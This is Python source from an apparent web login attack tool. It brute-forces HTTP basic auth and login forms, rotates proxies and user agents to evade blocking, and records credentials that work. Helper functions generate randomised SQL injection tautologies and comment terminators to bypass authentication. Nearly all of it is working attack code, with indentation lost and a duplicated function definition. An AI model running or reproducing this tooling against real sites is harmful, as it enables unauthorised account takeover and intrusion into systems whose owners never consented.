def submit(options, login_field, creds, result):
password, username = creds
if username in [x[1] for x in list(result.queue)]:
return True
try:
proc = Browser()
if options.proxy:
proxyAddr = list_choose_randomly(options.proxy)
proc.set_random_proxy(proxyAddr)
else:
proxyAddr = ""
resp = proc.open_url(options.url, auth=(username, password))
if resp.status_code == 401:
if options.verbose:
events.fail("['%s':%s'] <==> %s" %
(username, password, proxyAddr),
title=proc.get_title())
elif resp.status_code > 400:
events.error(
"[%s] ['%s': '%s']" % (proc.get_url(), username, password),
"%s" % resp.status_code)
else:
events.found(username, password, proc.get_title())
result.put([options.url, username, password])
except Exception as error:
events.error("%s" % (error), "BRUTE")
return False
finally:
proc.close()
def random_user_agent():
"""
Generate agent of client randomly
:return: string = agent value (PC)
"""
# TODO better useragent with library (or create my own - takes time)
from cores.actions import list_choose_randomly
return list_choose_randomly(data.getAgent().split("\n"))
def sCon():
conType = list_choose_randomly(["equal", "static", "compare"])
# Could be faster than create a dict and call element from dict
if conType == "static":
return list_choose_randomly(["not false", "true"])
elif conType == "compare":
genType = list_choose_randomly(["like", "rlike", "not like", "gl"])
if genType == "gl":
_stri1, _stri2 = string_gen_randomly(
select_type="dig"), string_gen_randomly(select_type="dig")
if int(_stri1) > int(_stri2):
return "%s > %s" % (_stri1, _stri2)
else:
return "%s > %s" % (_stri2, _stri1)
elif genType == "not like":
while True:
_stri1, _stri2 = string_gen_randomly(
select_type="char"), string_gen_randomly(
select_type="char")
# MAKE SURE WE ARE HAVING NOT LIKE
if _stri1 != _stri2:
break
return "'%s' %s '%s'" % (_stri1, genType, _stri2)
else:
_stri = string_gen_randomly(len_min=3,
len_max=5,
select_type="char")
return "'%s' %s '%s'" % (_stri, genType, _stri)
elif conType == "equal":
genType = list_choose_randomly(["char", "dig"])
_stri = string_gen_randomly(len_min=3,
len_max=5,
select_type=genType)
if genType == "char":
return "'%s'='%s'" % (_stri, _stri)
elif genType == "dig":
return "%s=%s" % (_stri, _stri)
def sEnd():
return list_choose_randomly(["-- --", "#", "--"])
def cCon():
return list_choose_randomly(["or", "||"])
def submit(options, login_field, tryCred, result):
password, username = tryCred
if username in [x[1] for x in list(result.queue)]:
return True
from cores.browser import Browser
isLoginSuccess = "False"
try:
proc = Browser()
if options.proxy:
# Set proxy connect
proxy_address = list_choose_randomly(options.proxy)
proc.set_random_proxy(proxy_address)
else:
proxy_address = ""
proc.open_url(options.url)
_form = find_login_form(proc.forms())
if not _form:
options.block_text = proc.get_response(
) # TODO check if block text changes
if options.verbose:
isLoginSuccess = "blocked"
events.error("Get blocked", "BRUTE")
return False
else:
form_control, form_fields = _form
if options.verbose and login_field != _form:
events.info("Login form has been changed", "BRUTE")
resp = proc.form_submit(form_control, form_fields, tryCred)
from cores.analysis import get_response_diff
text_changed, source_changed = get_response_diff(
options.txt.decode('utf-8'), resp.content.decode('utf-8'))
"""
If there is no other login form, check all changes in response
If there is no login request from all new urls -> successfully
== > Behavior: Login fail, click here or windows.location = login_page
"""
# "Login form is still there. Oops"
if find_login_form(proc.forms()):
isLoginForm = True
else:
isLoginForm = False
if not isLoginForm:
for new_url in get_redirection(source_changed):
if not new_url.startswith("http") and not new_url.endswith(
options.exceptions()):
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
new_url = urljoin(options.url, new_url)
if new_url and get_domain(options.url) == get_domain(new_url):
proc.open_url(new_url)
if find_login_form(proc.forms()):
isLoginForm = True
break
else:
isLoginForm = False
if not isLoginForm:
"""
Check SQL Injection
1. SQL Injection
2. Login successfully: No SQLi + No Login form
"""
if check_sqlerror(proc.get_response()):
isLoginSuccess = "SQLi"
elif text_changed == source_changed and text_changed != options.block_text and options.block_text:
pass
else:
if resp.status_code >= 400:
isLoginSuccess = "error"
else:
isLoginSuccess = "True"
# "If we tried login form with username+password field"
else:
pass
return True
except Exception as error:
"""
Sometimes, web servers return error code because of bad configurations,
but our cred is true.
This code block showing information, for special cases
"""
isLoginSuccess = "exception"
events.error("%s" % (error), "BRUTE")
finally:
if isLoginSuccess == "SQLi":
events.success("SQL Injection bypass", "BRUTE")
events.info("['%s': '%s']" % (username, password))
elif isLoginSuccess == "error" and options.verbose:
if username:
events.error(
"['%s':'%s'] <--> %s" %
(username, password, proxy_address),
"%s" % (resp.status_code))
else:
events.error("[%s] <--> %s" % (password, proxy_address),
"%s" % (resp.status_code))
elif isLoginSuccess == "True":
if username:
events.found(username, password, proc.get_title())
result.put([options.url, username, password])
else:
events.found('', password, proc.get_title())
result.put([options.url, username, password])
elif isLoginSuccess == "False" and options.verbose:
if username:
events.fail(
"['%s':'%s'] <==> %s" %
(username, password, proxy_address), text_changed,
proc.get_title())
else:
events.fail("['%s'] <==> %s" % (password, proxy_address),
text_changed, proc.get_title())
proc.close()